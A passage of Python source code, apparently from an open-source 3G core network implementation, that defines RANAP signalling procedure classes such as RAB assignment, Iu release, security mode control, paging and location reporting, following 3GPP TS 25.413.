)\n self.errcause, self.RNCInfo = None, {}\n try:\n self.decode_pdu(pdu_rx, self.RNCInfo)\n except Exception as err:\n self._err = err\n self._log('ERR', 'decode_pdu (%s), sending error indication' % err)\n # error cause: protocol, abstract-syntax-error-reject\n self.errcause = ('protocol', 100)\n \n def recv(self, pdu_rx):\n self._recv(pdu_rx)\n self._log('ERR', 'recv() not implemented')\n \n def _send(self):\n if self.TRACK_PDU:\n for pdu in self._pdu_tx:\n self._pdu.append( (time(), 'DL', pdu) )\n return self._pdu_tx\n \n def send(self):\n self._log('ERR', 'send() not implemented')\n return self._send()\n \n def trigger(self):\n return []\n \n def abort(self):\n if self.Code in self.RNC.ProcRanap:\n del self.RNC.ProcRanap[self.Code]\n self._log('INF', 'aborting')\n\n\nclass RANAPRABAssignment(RANAPSigProc):\n \"\"\"RAB Assignment: TS 25.413, section 8.2\n \n CN-initiated\n request-response(s)\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 41: RAB_ReleaseList (O)\n - 54: RAB_SetupOrModifyList (O)\n Extensions:\n - 233: UE_AggregateMaximumBitRate (O)\n - 239: MSISDN (O)\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 35: RAB_FailedList (O)\n - 38: RAB_QueuedList (O)\n - 39: RAB_ReleaseFailedList (O)\n - 43: RAB_ReleasedList (O)\n - 52: RAB_SetupOrModifiedList (O)\n Extensions:\n - 110: 
GERAN_Iumode_RAB_FailedList_RABAssgntResponse (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rAB_Assignment\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # TODO: currently, only the creation of RAB is handled here\n # the deletion of RAB should also be implemented at least, to support\n # the NAS SM procedure DeactivatePDPCtxtReq\n \n def send(self):\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._enable_gtpu()\n # in case of RAB teardown, we wait for the outcome to disable the GTP tunnels\n return self._send()\n \n def _enable_gtpu(self):\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n for nsapi in self._gtp_add_mobile_nsapi:\n pdpcfg = self.Iu.SM.PDP[nsapi]\n rabcfg = pdpcfg['RAB']\n pdpcfg['state'] = 1\n self.UE.Server.GTPUd.add_mobile(\n rabcfg['SGW-GTP-TEID'], # teid_ul\n pdpcfg['PDPAddr'], # mobile_addr\n (rabcfg['SGW-TLA'], rabcfg['HNB-TLA']), # local gtpu addr, hnb gtpu ip (maybe None)\n rabcfg['HNB-GTP-TEID']) # teid_dl (maybe None)\n else:\n self._log('WNG', 'enable_gtpu: no GTP mobile info provided')\n \n def _disable_gtpu(self):\n if hasattr(self, '_gtp_rem_mobile_nsapi'):\n for nsapi in self._gtp_rem_mobile_nsapi:\n if nsapi in self.Iu.SM.PDP:\n pdpcfg = self.Iu.SM.PDP[nsapi]\n self.Server.GTPUd.rem_mobile(pdpcfg['RAB']['SGW-GTP-TEID'])\n pdpcfg['state'] = 0\n else:\n self._log('WNG', 'disable_gtpu: no GTP mobile info provided')\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self.success = False\n self._log('WNG', 'error in the response decoding')\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._gtp_rem_mobile_nsapi = self._gtp_add_mobile_nsapi\n if hasattr(self, '_gtp_rem_mobile_nsapi'):\n self._disable_gtpu()\n else:\n self.success = True\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._gtp_rem_mobile_nsapi = []\n # TODO: rablists are sequence of sequence of rabitem...\n # here we go over all 1st level item\n # and take the 1st item of the previous selection to call it \"rabitem\"\n # in case rabitem are sequenced at the 2nd level, we won't see them...\n #\n if 'RAB_SetupOrModifiedList' in self.UEInfo:\n # RAB successfully established, to be completed with eNB IP and TEID\n for rabitem in self.UEInfo['RAB_SetupOrModifiedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_add_mobile_nsapi:\n rabcfg = self.Iu.SM.PDP[nsapi]['RAB']\n tla = rabitem['transportLayerAddress']\n if tla[1] == 32:\n # raw IPv4 address\n rabcfg['HNB-TLA'] = inet_ntoa(uint_to_bytes(*rabitem['transportLayerAddress']))\n elif tla[1] == 160:\n # X.213 addr\n x213pref = tla[0]>>136\n if x213pref>>16 == 0x35 and x213pref & 0xffff == 1:\n # IPv4 address\n rabcfg['HNB-TLA'] = inet_ntoa(uint_to_bytes((tla[0]>>104)&0xffffffff, 32))\n if rabcfg['HNB-TLA'] is None:\n self._log('WNG', 'no IPv4 TLA provided')\n self._gtp_rem_mobile_nsapi.append(nsapi)\n else:\n if rabitem['iuTransportAssociation'][0] == 'gTP-TEI':\n rabcfg['HNB-GTP-TEID'] = bytes_to_uint(rabitem['iuTransportAssociation'][1], 32)\n # activate the GTP DL parameters\n self.Server.GTPUd.set_mobile_dl(\n rabcfg['SGW-GTP-TEID'], # teid_ul\n ran_ip=(rabcfg['SGW-TLA'], rabcfg['HNB-TLA']),\n teid_dl=rabcfg['HNB-GTP-TEID'])\n else:\n self._log('WNG', 'no GTP TEID provided')\n self._gtp_rem_mobile_nsapi.append(nsapi)\n #\n if 'RAB_FailedList' 
in self.UEInfo:\n # RAB failed to establish, to be disabled\n for rabitem in self.UEInfo['RAB_FailedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_add_mobile_nsapi:\n self._gtp_rem_mobile_nsapi.append(nsapi)\n self._log('INF', 'unable to establish RAB %i, cause %r'\\\n % (nsapi, rabitem['cause']))\n #\n if 'RAB_QueueList' in self.UEInfo:\n self._log('WNG', 'handling of RAB-QueueList not implemented')\n # TODO\n #\n if 'RAB_ReleaseFailedList' in self.UEInfo:\n # RAB failed to be toredown\n for rabitem in self.UEInfo['RAB_ReleaseFailedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_rem_mobile_nsapi:\n self._log('INF', 'unable to release RAB %i, cause %r'\\\n % (nsapi, rabitem['cause']))\n #\n if 'RAB_ReleasedList' in self.UEInfo:\n # RAB successfully tore down\n for rabitem in self.UEInfo['RAB_ReleasedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_rem_mobile_nsapi:\n # nothing to do actually\n pass\n #\n if self._gtp_rem_mobile_nsapi:\n self._disable_gtpu()\n #\n if self._cb:\n self._ret = self.Iu.trigger_nas(self)\n self._cb = None\n else:\n self._ret = []\n \n def trigger(self):\n if self._ret:\n # new RANAP procedure prepared by the NAS layer\n return self._ret\n else:\n return []\n \n def abort(self):\n RANAPSigProc.abort(self)\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._gtp_rem_mobile_nsapi = self._gtp_add_mobile_nsapi\n self._disable_gtpu()\n\n\nclass RANAPRABReleaseRequest(RANAPSigProc):\n \"\"\"RAB Release Request: TS 25.413, section 8.3\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 41: RAB_ReleaseList (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rAB_ReleaseRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPIuReleaseRequest(RANAPSigProc):\n \"\"\"Iu Release Request: TS 25.413, section 8.4\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.iu_ReleaseRequest\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def recv(self, pdu):\n self._recv(pdu)\n \n def trigger(self):\n # copy the cause signaled by the RNC\n Proc = self.Iu.init_ranap_proc(RANAPIuRelease, Cause=self.UEInfo['Cause'])\n if Proc:\n return [Proc]\n else:\n return []\n\n\nclass RANAPIuRelease(RANAPSigProc):\n \"\"\"Iu Release: TS 25.413, section 8.5\n \n CN-initiated\n request-response\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n Extensions:\n - 252: End_Of_CSFB (O)\n - 254: Out_Of_UTRAN (O)\n - 277: PLMNidentity (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 31: RAB_DataVolumeReportList (O)\n - 44: RAB_ReleasedList_IuRelComp (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.iu_Release\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 
'uns': None\n }\n \n send = RANAPSigProc._send\n \n def _release_iu(self):\n # update mobility state\n if self.Iu.DOM == 'CS':\n if self.Iu.MM.state != 'INACTIVE':\n self.Iu.MM.state = 'IDLE'\n else:\n # suspend all RAB\n self.Iu.SM.pdp_suspend()\n if self.Iu.GMM.state != 'INACTIVE':\n self.Iu.GMM.state = 'IDLE'\n self._log('INF', 'UE disconnected, cause %r' % (self._NetInfo['Cause'], ))\n #\n # disconnect the Iu interface to the RNC for the UE\n self.Iu.unset_ran()\n self.Iu.unset_ctx()\n \n def recv(self, pdu):\n # recv the IuRelease response\n self._recv(pdu)\n # remove from the Iu RANAP procedure stack\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n self._release_iu()\n \n def abort(self):\n # remove from the Iu RANAP procedure stack\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n self._log('INF', 'aborting')\n self._release_iu()\n\n\nclass RANAPRelocationPreparation(RANAPSigProc):\n \"\"\"Relocation Preparation: TS 25.413, section 8.6\n \n RNC-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 4: Cause (M)\n - 7: ClassmarkInformation2 (C)\n - 8: ClassmarkInformation3 (C)\n - 20: OldBSS_ToNewBSS_Information (O)\n - 56: RelocationType (M)\n - 60: SourceID (M)\n - 61: Source_ToTarget_TransparentContainer (C)\n - 62: TargetID (M)\n Extensions:\n - 108: GERAN_Classmark (O)\n - 161: SourceBSS_ToTargetBSS_TransparentContainer (O)\n - 203: CSG_Id (O)\n - 226: SRVCC_HO_Indication (O)\n - 235: Cell_Access_Mode (O)\n - 259: RSRVCC_HO_Indication (O)\n SuccessfulOutcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 14: L3_Information (O)\n - 28: RAB_DataForwardingList (O)\n - 46: RAB_RelocationReleaseList (O)\n - 63: Target_ToSource_TransparentContainer (O)\n Extensions:\n - 99: InterSystemInformation_TransparentContainer (O)\n - 162: TargetBSS_ToSourceBSS_TransparentContainer (O)\n - 227: SRVCC_Information (O)\n - 260: RSRVCC_Information (O)\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n - 99: InterSystemInformation_TransparentContainer (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.relocationPreparation\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # not implemented\n\n\nclass RANAPRelocationResourceAllocation(RANAPSigProc):\n \"\"\"Relocation Resource Allocation: TS 25.413, section 8.7\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 4: Cause (M)\n - 11: EncryptionInformation (O)\n - 12: IntegrityProtectionInformation (O)\n - 23: PermanentNAS_UE_ID (O)\n - 49: RAB_SetupList_RelocReq (O)\n - 61: SourceRNC_ToTargetRNC_TransparentContainer (M)\n - 79: IuSignallingConnectionIdentifier (M)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 105: SNA_Access_Information (O)\n - 118: UESBI_Iu (O)\n - 127: PLMNidentity (O)\n - 133: CNMBMSLinkingInformation (O)\n - 203: CSG_Id (O)\n - 233: UE_AggregateMaximumBitRate (O)\n - 234: CSG_Membership_Status (O)\n - 239: MSISDN (O)\n - 261: PLMNidentity (O)\n - 289: PowerSavingIndicator (O)\n SuccessfulOutcome:\n IEs:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (O)\n - 9: CriticalityDiagnostics (O)\n - 35: RAB_FailedList (O)\n - 50: RAB_SetupList_RelocReqAck (O)\n - 63: 
TargetRNC_ToSourceRNC_TransparentContainer (O)\n      Extensions:\n      - 100: NewBSS_To_OldBSS_Information (O)\n      - 203: CSG_Id (O)\n    UnsuccessfulOutcome:\n      IEs:\n      - 4: Cause (M)\n      - 9: CriticalityDiagnostics (O)\n      Extensions:\n      - 100: NewBSS_To_OldBSS_Information (O)\n      - 108: GERAN_Classmark (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.relocationResourceAllocation\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': ({}, {})\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': ({}, {})\n        }\n    \n    # not implemented\n\n\nclass RANAPRelocationDetect(RANAPSigProc):\n    \"\"\"Relocation Detect: TS 25.413, section 8.8\n    \n    RNC-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n        None\n      Extensions:\n        None\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.relocationDetect\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # not implemented\n\n\nclass RANAPRelocationComplete(RANAPSigProc):\n    \"\"\"Relocation Complete: TS 25.413, section 8.9\n    \n    RNC-initiated\n    request only\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n        None\n      Extensions:\n      - 250: HigherBitratesThan16MbpsFlag (O)\n      - 262: TunnelInformation (O)\n      - 275: LHN_ID (O)\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.relocationComplete\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': None,\n        'uns': None\n        }\n    \n    # not implemented\n\n\nclass RANAPRelocationCancel(RANAPSigProc):\n    \"\"\"Relocation Cancel: TS 25.413, section 8.10\n    \n    RNC-initiated\n    request-response\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 4: Cause (M)\n      Extensions:\n        None\n    SuccessfulOutcome:\n      IEs:\n      - 9: CriticalityDiagnostics (O)\n      Extensions:\n        None\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.relocationCancel\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # not implemented\n\n\nclass RANAPSRNSContextTransfer(RANAPSigProc):\n    \"\"\"SRNS Context Transfer: TS 25.413, section 8.11\n    \n    CN-initiated\n    request-response\n    connection-oriented signalling procedure\n    \n    InitiatingMessage:\n      IEs:\n      - 29: RAB_DataForwardingList_SRNS_CtxReq (M)\n      Extensions:\n      - 167: RAT_Type (O)\n    SuccessfulOutcome:\n      IEs:\n      - 9: CriticalityDiagnostics (O)\n      - 25: RAB_ContextList (O)\n      - 85: RAB_ContextFailedtoTransferList (O)\n      Extensions:\n        None\n    \"\"\"\n    \n    # ASN.1 procedure description\n    Desc = RANAP.RANAP_PDU_Descriptions.sRNS_ContextTransfer\n    \n    # Custom decoders\n    Decod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    # Custom encoders\n    Encod = {\n        'ini': ({}, {}),\n        'suc': ({}, {}),\n        'uns': None\n        }\n    \n    send = RANAPSigProc._send\n    \n    def recv(self, pdu):\n        # recv the SRNSContextTransfer response\n        self._recv(pdu)\n        try:\n            del self.Iu.Proc[self.Code]\n        except Exception:\n            pass\n        if not self.errcause:\n            # TODO: do something with the list of RAB contexts\n            self._log('INF', 'success')\n\n\nclass RANAPSRNSDataForwarding(RANAPSigProc):\n    \"\"\"SRNS Data Forwarding: TS 25.413, section 8.12\n    
\n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 28: RAB_DataForwardingList (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.sRNS_DataForward\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRNSContextForwardToCN(RANAPSigProc):\n \"\"\"SRNS Context Forwarding from Source RNC to CN: TS 25.413, section 8.13\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 25: RAB_ContextList (M)\n Extensions:\n - 103: RRC_Container (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.forwardSRNS_Context\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPSRNSContextForwardToRNC(RANAPSigProc):\n \"\"\"SRNS Context Forwarding from CN to target RNC: TS 25.413, section 8.14\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 25: RAB_ContextList (M)\n Extensions:\n - 103: RRC_Container (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.forwardSRNS_Context\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # not implemented\n\n\nclass RANAPPaging(RANAPConlessSigProc):\n \"\"\"Paging: TS 25.413, section 8.15\n \n CN-initiated\n request only\n connection-less signalling procedure\n \n InitiatingMessage:\n IEs:\n - 3: CN_DomainIndicator (M)\n - 17: NonSearchingIndication (O)\n - 21: PagingAreaID (O)\n - 22: PagingCause (O)\n - 23: PermanentNAS_UE_ID (M)\n - 64: TemporaryUE_ID (O)\n - 76: DRX_CycleLengthCoefficient (O)\n Extensions:\n - 96: GlobalCN_ID (O)\n - 229: CSG_Id_List (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.paging\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n send = RANAPConlessSigProc._send\n\n\nclass RANAPCommonID(RANAPSigProc):\n \"\"\"Common ID: TS 25.413, section 8.16\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 23: PermanentNAS_UE_ID (M)\n Extensions:\n - 105: SNA_Access_Information (O)\n - 118: UESBI_Iu (O)\n - 127: PLMNidentity (O)\n - 202: SubscriberProfileIDforRFP (O)\n - 228: SRVCC_Operation_Possible (O)\n - 234: CSG_Membership_Status (O)\n - 249: Management_Based_MDT_Allowed (O)\n - 263: MDT_PLMN_List (O)\n - 272: RSRVCC_Operation_Possible (O)\n - 277: PLMNidentity (O)\n - 289: PowerSavingIndicator (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.commonID\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n self._log('INF', 'sent')\n return self._send()\n\n\nclass RANAPCNInvokeTrace(RANAPSigProc):\n \"\"\"CN Invoke Trace: TS 25.413, section 8.17\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n 
InitiatingMessage:\n IEs:\n - 19: OMC_ID (O)\n - 65: TraceReference (M)\n - 66: TraceType (O)\n - 68: TriggerID (O)\n - 69: UE_ID (O)\n Extensions:\n - 125: TracePropagationParameters (O)\n - 244: MDT_Configuration (O)\n - 251: TransportLayerAddress (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.cN_InvokeTrace\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n try:\n tracerefl = '0x%s' % hexlify(self.TraceReference).decode('ascii')\n except Exception:\n tracerefl = repr(self.TraceReference)\n self._log('INF', 'sent with trace reference %s' % tracerefl)\n return self._send()\n\n\nclass RANAPSecurityModeControl(RANAPSigProc):\n \"\"\"Security Mode Control: TS 25.413, section 8.18\n \n CN-initiated\n request-accept, request-reject\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 11: EncryptionInformation (O)\n - 12: IntegrityProtectionInformation (M)\n - 75: KeyStatus (M)\n Extensions:\n None\n SuccessfulOutcome:\n IEs:\n - 5: ChosenEncryptionAlgorithm (O)\n - 6: ChosenIntegrityProtectionAlgorithm (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n UnsuccessfulOutcome:\n IEs:\n - 4: Cause (M)\n - 9: CriticalityDiagnostics (O)\n Extensions:\n None\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.securityModeControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': ({}, {})\n }\n \n send = RANAPSigProc._send\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self._log('WNG', 'error in the response decoding')\n self.success = False\n self.Iu.SEC['CKSN'] = None\n elif pdu[0] == 'unsuccessfulOutcome':\n try:\n self._log('WNG', 'failure, rejected with cause %r' % (self.UEInfo['Cause'], ))\n except Exception:\n self._log('WNG', 'failure, rejected without cause')\n self.success = False\n self.Iu.reset_sec_ctx()\n else:\n self.success, self._ret = True, []\n # update the Iu security context with selected algorithms\n secctx = self.Iu.SEC[self.Iu.SEC['CKSN']]\n try:\n secctx['UEA'] = self.UEInfo['ChosenEncryptionAlgorithm']\n uea = secctx['UEA']\n except Exception:\n secctx['UEA'] = None\n uea = 0\n try:\n secctx['UIA'] = self.UEInfo['ChosenIntegrityProtectionAlgorithm']\n uia = 1 + secctx['UIA'] # UIA1 -> uia = 1, UIA2 -> uia = 2\n except Exception:\n secctx['UIA'] = None\n uia = 0\n self._log('INF', 'accepted with UEA%i / UIA%i' % (uea, uia))\n #\n # signal the result back to the NAS stack if required\n if self._cb:\n self._ret = self.Iu.trigger_nas(self)\n self._cb = None\n \n def trigger(self):\n if not self.success:\n # copy the cause signaled by the RNC\n Proc = self.Iu.init_ranap_proc(RANAPIuRelease, Cause=self.UEInfo['Cause'])\n if Proc:\n return [Proc]\n else:\n return []\n else:\n # new RANAP procedures may have been prepared by the NAS layer\n return self._ret\n\n\nclass RANAPLocationReportingControl(RANAPSigProc):\n \"\"\"Location Reporting Control: TS 25.413, section 8.19\n \n CN-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 57: RequestType (M)\n Extensions:\n - 111: VerticalAccuracyCode (O)\n - 112: ResponseTime (O)\n - 113: PositioningPriority (O)\n - 114: ClientType (O)\n - 
164: IncludeVelocity (O)\n - 168: PeriodicLocationInfo (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationReportingControl\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n def send(self):\n self._log('INF', 'sent with request type %r' % self.RequestType)\n return self._send()\n\n\nclass RANAPLocationReport(RANAPSigProc):\n \"\"\"Location Report: TS 25.413, section 8.20\n \n RNC-initiated\n request only\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 0: AreaIdentity (O)\n - 4: Cause (O)\n - 57: RequestType (O)\n Extensions:\n - 97: LastKnownServiceArea (O)\n - 119: PositionData (O)\n - 120: PositionDataSpecificToGERANIuMode (O)\n - 122: AccuracyFulfilmentIndicator (O)\n - 165: VelocityEstimate (O)\n - 283: BarometricPressure (O)\n - 285: CivicAddress (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.locationReport\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': None,\n 'uns': None\n }\n \n _PosDataDiscLUT = {\n 0 : 'Positioning Data Set present (non-GANSS methods used)',\n 1 : 'GANSS Positioning Data Set present (GANSS methods used)',\n 2 : 'Additional Positioning Data Set'\n }\n _PosMethLUT = {\n 5 : 'Mobile Assisted GPS',\n 6 : 'Mobile Based GPS',\n 7 : 'Conventional GPS',\n 8 : 'U-TDOA',\n 9 : 'OTDOA',\n 10 : 'IPDL',\n 11 : 'RTT',\n 12 : 'Cell ID'\n }\n _UsageLUT = {\n 0 : 'Attempted unsuccessfully due to failure or interruption - not used',\n 1 : 'Attempted successfully: results not used to generate location - not used',\n 2 : 'Attempted successfully: results used to verify but not generate location - not used',\n 3 : 'Attempted successfully: results used to generate location',\n 4 : 'Attempted successfully: case where MS supports multiple mobile based positioning methods '\\\n 'and the actual method or methods used by the MS cannot be determined'\n }\n _GANSSPosMethLUT = {\n 0 : 'MS-Based',\n 1 : 'MS-Assisted',\n 2 : 'Conventional'\n }\n _GANSSID = {\n 0 : 'Galileo',\n 1 : 'SBAS',\n 2 : 'Modernized GPS',\n 3 : 'QZSS',\n 4 : 'GLONASS',\n 5 : 'BDS '\n }\n _AddPosMethLUT = {\n 1 : 'MS-Assisted',\n 2 : 'Standalone'\n }\n _AddID = {\n 0 : 'Barometric Pressure',\n 1 : 'WLAN',\n 3 : 'Bluetooth',\n 4 : 'MBS'\n }\n \n def recv(self, pdu):\n # recv the data volume report response\n self._recv(pdu)\n if not self.errcause:\n desc, ueinfo = [], dict(self.UEInfo)\n if 'RequestType' in ueinfo:\n del ueinfo['RequestType']\n if 'AreaIdentity' in ueinfo and ueinfo['AreaIdentity'][0] == 'sAI':\n desc.append('SAI PLMN %s, LAC 0x%.4x, SAC 0x%.4x'\\\n % (plmn_buf_to_str(ueinfo['AreaIdentity'][1]['pLMNidentity']),\n unpack('>H', ueinfo['AreaIdentity'][1]['lAC'])[0],\n unpack('>H', ueinfo['AreaIdentity'][1]['sAC'])[0]))\n del ueinfo['AreaIdentity']\n if 'PositionData' in ueinfo:\n try:\n desc.extend( self._get_position_data(ueinfo['PositionData']) )\n except Exception:\n pass\n else:\n del ueinfo['PositionData']\n if ueinfo:\n # some more unprocessed values\n desc.extend(['%s, %r' % (k, v) for (k, v) in ueinfo.items()])\n self._log('INF', ' | '.join(desc))\n \n @classmethod\n def _get_position_data(cls, data):\n disc, ds, desc = data['positioningDataDiscriminator'][0], data['positioningDataSet'], []\n if disc == 0:\n pmu = ord(ds[0])\n pm, pu = pmu>>3, pmu&0x7\n 
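# each non-GANSS positioning data octet packs the method in its 5 MSB and\n            # the usage in its 3 LSB, e.g. 0x63 -> method 12 (Cell ID), usage 3\n            # (results used to generate location)\n            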
